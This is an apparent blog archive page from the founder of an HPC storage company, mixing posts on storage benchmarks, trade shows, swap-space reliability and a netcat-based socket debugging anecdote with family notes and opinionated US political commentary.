#SC14 day 2: @LuceraHQ tops @scalableinfo hardware ... with Scalable Info hardware ...
Report XTR141111 was just released by STAC Research for the M3 benchmarks. We are absolutely thrilled, as some of our records were bested by newer versions of our hardware with newer software stack. Congratulations to Lucera, STAC Research for getting the results out, and the good folks at McObject for building the underlying database technology. This result continues and extends Scalable Informatics domination of the STAC M3 results. I’ll check to be sure, but I believe we are now the hardware side of most of the published records.
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Here’s why.
Swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
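The failure argument above can be put in rough numbers. This is a minimal sketch in Python, assuming the components fail independently and using purely hypothetical annual failure probabilities for RAM and the swap device (the values are illustrative only, not measurements):

```python
def path_failure_probability(*component_failure_probs: float) -> float:
    """Probability that at least one component in a serial path fails,
    assuming the components fail independently of each other."""
    survive = 1.0
    for p in component_failure_probs:
        survive *= (1.0 - p)
    return 1.0 - survive

# Hypothetical annual failure probabilities, chosen only for illustration.
P_RAM = 0.001
P_SWAP_DISK = 0.03

memory_only = path_failure_probability(P_RAM)
memory_plus_swap = path_failure_probability(P_RAM, P_SWAP_DISK)

print(f"memory only:      {memory_only:.4f}")
print(f"memory plus swap: {memory_plus_swap:.4f}")
```

Under these assumptions the combined path is always at least as likely to fail as its worst component, which is the point being made about paging to disk.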
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000
Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. It’s way too freaking simple.
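The missing-newline failure is easy to reproduce. Here is a minimal sketch in Python, assuming a line-oriented plaintext receiver that only treats a record as complete once it sees a newline. The helper names (`frame_line`, `read_complete_lines`, `roundtrip`) and the sample record are hypothetical, and the post does not say which protocol was in use:

```python
import socket

def frame_line(record: str) -> bytes:
    """Encode one record for a line-oriented receiver,
    guaranteeing exactly one trailing newline."""
    return (record.rstrip("\r\n") + "\n").encode("utf-8")

def read_complete_lines(buffer: bytes) -> list[bytes]:
    """Return only the newline-terminated records in the buffer.
    A trailing unterminated fragment is dropped, which is how a
    missing newline makes data appear to vanish."""
    *complete, _partial = buffer.split(b"\n")
    return complete

def roundtrip(payload: bytes) -> list[bytes]:
    """Send payload across a local socket pair and parse what arrives."""
    sender, receiver = socket.socketpair()
    sender.sendall(payload)
    sender.close()
    received = b""
    while chunk := receiver.recv(4096):
        received += chunk
    receiver.close()
    return read_complete_lines(received)

# Hypothetical sample record: name, value, timestamp.
raw = "lightning.cpuload.avg1 0.42 1400000000"
print(roundtrip(raw.encode("utf-8")))  # unterminated record
print(roundtrip(frame_line(raw)))      # newline-terminated record
```

Routing every outgoing record through one framing helper makes the terminator hard to forget, whatever the receiver turns out to be.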
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics
metrics> \list series
.----------------------------------.
| series name                      |
+----------------------------------+
| lightning.cpuload.avg1           |
| lightning.cputotals.idle         |
| lightning.cputotals.irq          |
| lightning.
Posts
Comcast finally fixed their latency issue
This has been a point of contention for us for years. Our office has multiple network attachments, and Comcast is one of them. This is the main office, not the home office. Latency on the link, as measured by DNS pings, has always been fairly high, in the 2-3ms region, as compared to our other connection (using a different provider and a different technology) which has been consistently 0.5ms for the last 2 years.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/
Filesystem Size Used Avail Use% Mounted on
fhgfs_nodev 1.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Day job at HPC on Wall Street on Monday the 9th
We’ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think ‘bloody fast NAT’ and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
Massive. Unapologetic. Firepower. 24GB/s from siFlash
Oh yes we did. Oh yes. We did. This is the fastest storage box we are aware of, in market. This is so far outside of ram, and outside of OS and RAID level cache …
[root@siFlash ~]# fio srt.fio
...
Run status group 0 (all jobs):
READ: io=786432MB, aggrb=23971MB/s, minb=23971MB/s, maxb=23971MB/s, mint=32808msec, maxt=32808msec
This is 1TB read in 40 seconds or so. 1PB read in 40k seconds (1/2 a day).
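The arithmetic behind those figures can be checked directly. This small Python sketch uses only the `io=` and `mint=` values from the fio summary, and assumes 1 TB = 10^6 MB and 1 PB = 10^9 MB for the extrapolation (fio's own "MB" may be binary, which would shift the results by a few percent):

```python
IO_MB = 786_432       # io= value from the fio summary
RUNTIME_MS = 32_808   # mint=/maxt= value from the fio summary

bandwidth_mb_s = IO_MB / (RUNTIME_MS / 1000.0)

# Extrapolate to larger reads at the same sustained rate (decimal units assumed).
seconds_per_tb = 1_000_000 / bandwidth_mb_s
seconds_per_pb = 1_000_000_000 / bandwidth_mb_s

print(f"bandwidth: {bandwidth_mb_s:,.0f} MB/s")
print(f"1 TB read: {seconds_per_tb:.1f} s")
print(f"1 PB read: {seconds_per_pb:,.0f} s ({seconds_per_pb / 3600:.1f} hours)")
```

The computed rate agrees with the reported aggrb to within rounding, and the extrapolations are consistent with "40 seconds or so" per TB and roughly half a day per PB.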
Posts
Playing with AVX
I finally took some time from a busy schedule to play with AVX. I took my trusty old rzf code (Riemann Zeta function) and rewrote the time expensive inner loop in AVX primitives hooked to my C code. As a reminder, this code is a very simple sum reduction, and can be trivially parallelized. Vectorization isn’t as straightforward, and I found that compiler auto-vectorization doesn’t work well for it.
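The reduction structure is easy to see in a few lines. This is a sketch in Python rather than the C/AVX of the rzf code, so it shows only why the sum parallelizes trivially, not the vectorization itself. The function names and the chunk count are hypothetical:

```python
import math

def zeta_partial(s: float, start: int, stop: int) -> float:
    """Sum of 1/k**s for k in [start, stop). Terms are added smallest
    first (largest k first) to limit floating-point rounding error."""
    return sum(1.0 / k**s for k in range(stop - 1, start - 1, -1))

def zeta_chunked(s: float, n_terms: int, n_chunks: int = 4) -> float:
    """Split the index range into independent chunks, reduce each one
    separately, then combine. Each chunk could run on its own core."""
    bounds = [1 + (n_terms * i) // n_chunks for i in range(n_chunks + 1)]
    partials = [zeta_partial(s, lo, hi) for lo, hi in zip(bounds, bounds[1:])]
    return sum(partials)

approx = zeta_chunked(2.0, 1_000_000)
print(approx, math.pi**2 / 6)
```

Because the chunks share no state, the only coordination needed is the final sum of partial results. Vectorizing the inner loop is a separate problem, since each term needs a division and a power.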
Posts
Amusing
The IBM folks have turned the Blue Gene into what they claim is the world’s fastest blast engine. Interesting read. They use our A. thaliana data in the Bioinformatics Benchmark System v3 (BBS) to perform their measurement, as well as data from Aaron Darling for mpiBLAST. Our data had been in a mislabeled file for years, and I never took the time to rename the S. lycopersicum for the original Arabidopsis.
Category: personal
Posts
Typecasting and the "trust us" factor
Finding myself on the other side of the table in the consumer-vendor relationship has resulted in some eye opening experiences. These are things I look back on, and realize that I strenuously avoided doing during my Scalable days. But I see everyone doing it now, as they try to sell me stuff, or convince me to use things. One of the eye opening things is a bit of typecasting of sorts.
Posts
Some updates coming soon
I should have something interesting to talk about over the next two weeks, though the summary is that Scalable Informatics is undergoing a transformation. The exact form of this transformation is still being determined. In any case, I am no longer at Scalable. Some items of note in recent weeks.
M&A: Nimble was purchased by HPE. Not sure of the specifics of “why”, other than HPE didn’t have much in this space.
Posts
Ten years ago this blog was born
This was my first post. On 12-October-2005. I’ve written about many things over the past decade. 2000 plus posts, 200 per year, averages about 4 every 7 days or so. I’ve slowed down a bit in recent months, as work has grown more intense, but there are many thoughts I want to get down. To a large extent, my journey through HPC has been an interesting one, and only slightly captured in these posts.
Posts
Three years
It’s been 3 years to the day since I wrote this. As we’ve been doing before this happened, and after this happened, we are going to a TSO concert on the anniversary of the surgery. It’s an affirmation of sorts. I can tell you that 3 years in, it has changed me in some fairly profound ways … I no longer take some things for granted. I try to spend more time with the family, do more things with them.
Posts
Brings a smile to my face
My soon to be 15 year old daughter was engrossed with something on her laptop yesterday. Thinking it was fan-fiction, I asked her what she was writing. She knitted her brow for a moment, and looked up. “It’s code combat Dad.” she said, quite matter of factly. I must have had a slightly startled expression on my face. I knew she had dabbled with it, and had recommended (/sigh) Python as a language, after she took (and aced) a Java class last year, as Python is inherently simpler.
Posts
An article on Detroit that is worth the read
Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn’t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.
Posts
Definition of vacation
… appears to be normal working hours from a location that is not your office, home … I am supposed to be on vacation. A short one, as there are simply far too many things on my plate (notice my recent posting frequency?). Instead, I am trying to solve problems for customers, sign NDAs, handle support calls. What was the purpose of vacation or holiday again? I keep forgetting.
Posts
I have finally given in to the borg collective
I am now on Facebook. Turns out my family and all my friends are there, so … … how soon before we have to change for the next great social network platform? I’ve got more than one Twitter account (@sijoe and @scalableinfo), a linkedin account, a google+ account (that for the life of me I can’t really figure out), and now facebook. Not to mention 2 blogs (here and at work).
Posts
Another bucket list item
On my vacation in NY recently, I happened to be able to tick off another item on my bucket list. There’s some background to it, but here’s the pics.
[ ](/images/IMG_1454.JPG)
[ ](/images/IMG_1456.JPG)
and
[ ](/images/IMG_1459.JPG)
The background to this is a short story I’ve been working on for a while. A near future serum run in effect. Should be done very soon, though I’ve been working on it in very short bursts.
Posts
OT: Canton MI Olympian and an Olympian hopeful
Took off work early to take family (and Captain!) to see Allison Schmitt at Canton’s Heritage Park. For those who don’t know, Allison won 3 gold medals, a silver, and a bronze at the 2012 Olympics in London. We watched 2 of her races, most of Ryan Lochte’s, Michael Phelps, and as many of the swimming contests as NBC broadcast (sadly not enough). My wife and I enjoyed the races, and, as it turns out, so did my daughter.
Category: politics
Posts
Voting in HPCWire's readers choice awards are open, please vote!
Our friends at Lucera are in number 6 for best use of HPC in a financial services category. Our Unison product is at number 11 for Best HPC Storage Product or Technology. And I did a write in for #21 for us :D. Our friends at Mellanox have their 100Gb EDR Infiniband technology at number 14. Please do vote (early, not often).
Posts
An article on Detroit that is worth the read
Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn’t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.
Posts
Why not go Galt?
For those who don’t get the reference, “going Galt” points back to the masterpiece novel “Atlas Shrugged” by Ayn Rand. In it, one of the characters is named John Galt, and part of what he does, early in the novel, is convince those who create jobs, and wealth in the country, to abandon their efforts, as the government lurches harder and farther to the redistributionist world view. Indeed, the country eventually goes full on socialist in the story, where people are not allowed to quit work, take a better job, and so forth.
Posts
Oh dear lord
Let’s see if this actually materializes. It’s pretty obvious as to how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straightforward definition in the US Constitution.
Posts
You get what you vote for
This is sad.
Here are the really sad parts of this
* Not only did they close the parks, but they turned off the web sites
* The park employees are being ordered to make life as hard as possible for the patrons.
None of this had to happen. Had the Democrats decided that, ya know, in a political environment where negotiation is the key to advancing agendas, and not a burnt ground strategy, chances are they would be able to get some of what they wanted.
Posts
Dead on correct article
What many of us worried about years ago was whether or not we were electing an empty suit to the highest political office in the land. Someone with no experience running anything. With no great accomplishments upon which to build. Simply a moderate orator with a teleprompter. 5 years in, our worst fears don’t even appear to scratch the surface of the failure that we have brought upon ourselves. This piece at the Wall Street Journal is so completely spot on.
Posts
Part of the reason why Detroit has a long rough road ahead
is due, in significant part, to bad law and bad policy enshrined in law. Ideological view points are hard coded in the firmware of Michigan. Which allows lawsuits and results such as this. It cannot be overemphasized how bone-headed this particular law is. That one can never, under any circumstances, reduce pensioner benefit values. This means, if you ever struck a bad deal, like Detroit, and many others in Michigan have, you have no choice but to continue this bad deal for eternity.
Posts
... and bang goes Detroit ...
This brings me no joy. I went to grad school in Detroit. I like this city. It has character, it has guts, it has potential. It also has no cash to continue operations. And that sucks. Detroit filed for chapter 9 bankruptcy a few hours ago. There are many reasons for this, but there are a number of specific ones, that are generalizable to businesses as well. First, population decline has led to a tax revenue decline.
Posts
You can't make this stuff up, 10-June-2013 edition
Link here. Don’t want to tax ALL businesses … out of business? Just some of them? Are you mad? Are you freaking kidding me? Pulling my leg? Very sad. Very very sad. The government should be seeking to reduce taxes to make sure businesses grow, and hire, and spend. Mr. President, the entire role of government in business should be to get out of the way, lest you slow down growth, employment, and spending.
Posts
That's what now ... 5 live scandals?
[Update] That didn’t take long. Looks like the government is angry about all of this. The leak of the leaks that is. And they are going to try to find the culprit, and prosecute them. Any “Mea Culpas” from them on the fact that this is … I dunno … illegal? Er … no. Most transparent admin … evuh??? I read something last week which made me laugh. It read “tomorrow is Thursday, time for a new scandal”.
Posts
When you've lost Jon Stewart ...
Here in the US, we have a number of scandals brewing. Many of those for the party in control of the White House and the Senate would like to have you believe that these are in fact tempests in teapots. In this case, there are at least 2 Nixonian scandals going non-linear here, with a 3rd trying to break through. The political left is doing all it can to wave off one of them, though this is getting progressively harder by the day as more information comes out.
Posts
Do we really have enough native STEM workers in the US?
Yes, actually we do. Too many. Turns out that little law of supply and demand does in fact hold true. The higher the demand for something in limited supply, the higher the price (wages) you will pay for it. By applying forces to this law, you impact a number of outcomes. That is, if you start monkeying around with the supply, sure, you can adjust the price you pay for the STEM.
Posts
This will not end well
Watching the slow motion train wreck in Cyprus made me wonder exactly whom the target of the money grab was. And more importantly, whether or not the people making demands had any clue that their victory was, at best, Pyrrhic, and at worst, a serious contagion. Any financial system in operation is built upon various levels of trust, implicitly in the case of the least risky capital storage system. You know that you can trust, within reasonable expectations and parameters, that capital that you deposit there can be retrieved later.
Posts
The sequester is here
Suffice it to say that much hot air was blown over the sequester in the media. Really, there was much tearing of clothes over this. Much righteous indignation that someone in government, somewhere, would have to make (not so very hard) decisions about where to trim budgets. We needed this, as the US government is so completely broken as to not be able to propose a reasonable budget, pass a reasonable budget, nor listen to and work with ideas from other portions of the legislative branch which want to work on reasonable budgets.
Posts
Nails it !!!
Dave Barry in his usual fine form … summarizes our year. The one take away should be … WHAP
Posts
1 January 2013 : its over the cliff we go!
[update] This pretty much says it all. [update 2] … and … they … fold. A bad deal, about to be voted into law. As they said, elections have consequences. Whatever happens, they (WH and Senate) now own it. No cuts, just taxes. Even though our problem is way too much spending and mis-targeted tax increases.
Less than 10 hours into the new year for us here in GMT-5. There is some aspect of humanity whereby many view this as a hopeful time, a chance to “begin anew”.
Posts
On the dangers of economic prognostication, and presidential elections
is drinking your own koolaid, consuming your own product, believing the wishful thinking that underlies your most serious predictions. Like this. Just like in catastrophic AGW, there’s one single chart that belies all the claims as to how “well” the “stimulus” package did. It’s a damning chart. Here it is.
[ ](http://www.aei-ideas.org/2012/11/is-this-as-good-as-it-gets-novembers-dismal-new-normal-jobs-report/)
And worse, if you look at how the recovery compares to others … it’s not going very well at all.
Posts
When you've lost Dilbert ...
… the game may be over. Ok, this is a very well written, and extremely cogent argument. Scott Adams, creator of Dilbert, indicated why he’s not supporting Obama, and is endorsing Romney in the US Presidential election. His reasons boil down to a firing offense Mr. Obama committed (in Adams' opinion). More specifically, he indicates that he doesn’t like lots of Romney’s positions, but Romney hasn’t committed this particular offense. And specifically to the point of competence, Adams gets that Romney is a turn-around guy.
Posts
Interesting and depressing article on Michigan's future
A few prefaces … First, I disagree with the premise throughout this article that our governor is timid. He is, IMO, and in many people’s opinion, doing a great job. Governor Romney is very similar to Governor Snyder in many ways. Timidity really isn’t apparent. I guess that people see someone making a cost-benefit analysis for engaging in a particular debate, or pushing for a particular outcome, and deciding to forgo a particular fight, as being timid.
Posts
hits bottom, digs deeper
[update] below the fold and video. I can only conclude at this point that the “don’t get it” disease runs deep and wide in this administration. [update 2] This at the WSJ encapsulates what we are observing. This has gone beyond painful to watch to embarrassing. The president now claims that his statements were sliced and diced. He now is saying that he believes that businesses built themselves, while claiming that his earlier statement was taken out of context.
Posts
why do people double down when they are wrong?
And do it again,
… sooooo …. a public works project (bridge, dam, …) is equivalent in his eyes to …. a risk an entrepreneur takes? Seriously?
Erp …. it’s glaringly obvious who does not have an understanding. The worker in the private sector punches the clock BECAUSE somewhere, somewhen, the entrepreneur had the idea, took the risk, entirely upon themselves, and built something. The “public sector” is a cost, something to be kept as small as possible so as not to drive those paying the public sector’s bills into the poor house.
Posts
How I'd like politicians to view entrepreneurs
Wonderful post by Jim Pethokoukis, covering a talk made by Ronald Reagan years ago.
and
I will freely admit that I was (almost) completely wrong in my original impressions of Reagan. I had a different political outlook in those days, and I had trouble viewing the guy as getting it. But get it, he did. This change in perception comes mostly from a maturing and a rethinking of my own world view.
Posts
... and now the cartoons ...
below the fold. Snarfed from many places on the net. Copyrights are owned by their respective owners. I don’t know all the correct attributions, so if you find/know of it, please let me know so I can correctly update the list.
The few remaining defenders of this failed statement and meme are all parroting, seemingly, the exact same talking points. Now why would that be? Most everyone else, regardless of political affiliation, realizes what a complete mess this has become … well … those outside of the media.
Posts
OT: I want to comment on this ...
[update] Good for them, the NFIB hits back, hard. No mental gymnastics required to correctly interpret what was said. Further they back it up with almost identical quotes from Elizabeth Warren herself, who appears to be the originator of this epic failure of a meme. This entire meme deserves all the derision being heaped on it. [update 2] And the pile on begins in earnest. James Pethokoukis (economics blogger and many other things) has some good comments of his own, as well as from others.
Category: recent-history
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
An article on Detroit that is worth the read
Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn’t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Oh dear lord
Let’s see if this actually materializes. It’s pretty obvious how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straightforward definition in the US Constitution.
Posts
You get what you vote for
This is sad.
Here’s the really sad parts of this
Not only did they close the parks, but they turned off the web sites. The park employees are being ordered to make life as hard as possible for the patrons. None of this had to happen. Had the democrats decided that, ya know, in a political environment where negotiation is the key to advancing agendas, and not a burnt ground strategy, chances are they would be able to get some of what they wanted.
Posts
Another bucket list item
On my vacation in NY recently, I happened to be able to tick off another item on my bucket list. There’s some background to it, but here’s the pics.
[ ](/images/IMG_1454.JPG)
[ ](/images/IMG_1456.JPG)
and
[ ](/images/IMG_1459.JPG)
The background to this is a short story I’ve been working on for a while. A near future serum run in effect. Should be done very soon, though I’ve been working on it in very short bursts.
Posts
That's what now ... 5 live scandals?
[Update] That didn’t take long. Looks like the government is angry about all of this. The leak of the leaks that is. And they are going to try to find the culprit, and prosecute them. Any “Mea Culpas” from them on the fact that this is … I dunno … illegal? Er … no. Most transparent admin … evuh??? I read something last week which made me laugh. It read “tomorrow is Thursday, time for a new scandal”.
Posts
When you've lost Jon Stewart ...
Here in the US, we have a number of scandals brewing. Many of those for the party in control of the White House and the Senate would like to have you believe that these are in fact tempests in teapots. In this case, there are at least 2 Nixonian scandals going non-linear here, with a 3rd trying to break through. The political left is doing all it can to wave off one of them, though this is getting progressively harder by the day as more information comes out.
Posts
This will not end well
Watching the slow motion train wreck in Cyprus made me wonder exactly whom the target of the money grab was. And more importantly, whether or not the people making demands had any clue that their victory was, at best, Pyrrhic, and at worst, a serious contagion. Any financial system in operation is built upon various levels of trust, implicitly in the case of the least risky capital storage system. You know that you can trust, within reasonable expectations and parameters, that capital that you deposit there can be retrieved later.
Posts
The sequester is here
Suffice it to say that much hot air was blown over the sequester in the media. Really, there was much tearing of clothes over this. Much righteous indignation that someone in government, somewhere, would have to make (not so very hard) decisions about where to trim budgets. We needed this, as the US government is so completely broken as to not be able to propose a reasonable budget, pass a reasonable budget, nor listen to and work with ideas from other portions of the legislative branch which want to work on reasonable budgets.
Posts
Nails it !!!
Dave Barry in his usual fine form … summarizes our year. The one take away should be … WHAP
Category: risk
Posts
Excellent article on mistakes made for infrastructure ... cloud jail is about right
Article is here at Firstround capital. This goes to a point I’ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don’t work. We’ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.) Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really … really grok what is going on.
Posts
M&A fallout: Cisco may have ditched Invicta after buying Whiptail
Article is here, take it as a rumor until we hear from them. My comments: First, M&A is hard. You need a good fit product wise (little overlap and great complementary functions/capabilities), and culture/people fit matters. Second, sales teams need to be on-board selling complete solutions involving the acquired tech. Sometimes this doesn’t happen, for any number of reasons, some fixable, some not. Third, Cisco is out of the storage game if this is true.
Category: science
Posts
Opening keynote @Supercomputing #SC18 : #HPC is an enabling technology ...
… Ok, the speaker said far more than that. But one of his central theses is that in this “second” machine revolution, we are enabling data driven decision making, distributed decision and consensus, as well as expanding beyond the confines of specific expertise in a field. The latter I’ve heard described as cross fertilization … gather a bunch of smart people “together” and give them a problem spec. Let them run with it.
Posts
I always thought a Ph.D. defense should have a dance component
As seen here. I like the enTANGOeled photons. Not sure how I’d do mine, but it’s at least amusing to think through.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Brings a smile to my face
My soon to be 15 year old daughter was engrossed with something on her laptop yesterday. Thinking it was fan-fiction, I asked her what she was writing. She knitted her brow for a moment, and looked up. “It’s code combat Dad.” she said, quite matter of factly. I must have had a slightly startled expression on my face. I knew she had dabbled with it, and had recommended (/sigh) Python as a language, after she took (and aced) a Java class last year, as Python is inherently simpler.
Posts
Fantastic lecture from Michael Crichton
This is Michael Crichton of Andromeda Strain, Jurassic Park, and other stories. Fantastic story teller, he absolutely nails his subject. The original was on his website, and I grabbed a copy from here. One of the wonderful quotable paragraphs within is this:
A real scientist is, by its own very definition, a skeptic.
Category: scxx
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com. You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison)
* 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system
* 100Gb connection to a partner/customer booth
* Forte

100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
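For a sense of scale, the arithmetic behind that iperf number can be sketched roughly as below. This is a back-of-the-envelope calculation, assuming a nominal 100 Gb/s line rate in each direction, ignoring protocol overhead, and assuming the 20GB/s figure is the sum of both directions. The function name is made up for illustration.

```python
def line_rate_gbytes_per_s(gbits_per_s: float, directions: int = 1) -> float:
    """Convert a nominal line rate in Gb/s to GB/s (8 bits per byte),
    summed over the given number of directions."""
    return gbits_per_s / 8.0 * directions


# Nominal peak for a bidirectional test on a 100Gb link (assumption: 2 x 100 Gb/s).
peak = line_rate_gbytes_per_s(100, directions=2)

# Figure quoted in the post for the bidirectional iperf run.
observed = 20.0

print(f"nominal peak: {peak:.1f} GB/s, achieved fraction: {observed / peak:.0%}")
```

Under those assumptions the quoted result sits at a large fraction of what the wire can nominally carry, which is why it stands out next to 40/56GbE.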
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
* Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture
* Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances
* Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance
* Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance
* Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
#SC14 day 2: @LuceraHQ tops @scalableinfo hardware ... with Scalable Info hardware ...
Report XTR141111 was just released by STAC Research for the M3 benchmarks. We are absolutely thrilled, as some of our records were bested by newer versions of our hardware with newer software stack. Congratulations to Lucera, STAC Research for getting the results out, and the good folks at McObject for building the underlying database technology. This result continues and extends Scalable Informatics domination of the STAC M3 results. I’ll check to be sure, but I believe we are now the hardware side of most of the published records.
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Here’s why.
Swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
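The failure likelihood argument can be made concrete with a small sketch. It assumes component failures are independent, and the probabilities used are hypothetical placeholders chosen only to show the shape of the effect, not measured values.

```python
from math import prod


def path_failure_probability(component_failure_probs):
    """Probability that at least one component in a pathway fails,
    assuming the components fail independently of each other."""
    return 1.0 - prod(1.0 - p for p in component_failure_probs)


# Hypothetical per-interval failure probabilities (illustrative only).
P_RAM = 0.001   # memory subsystem
P_DISK = 0.02   # swap device

ram_only = path_failure_probability([P_RAM])
ram_plus_swap = path_failure_probability([P_RAM, P_DISK])

print(f"RAM only:      {ram_only:.5f}")
print(f"RAM plus swap: {ram_plus_swap:.5f}")
```

Whatever the real numbers are, adding a less reliable device to a path that assumes no failure can only push the combined failure probability up.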
Posts
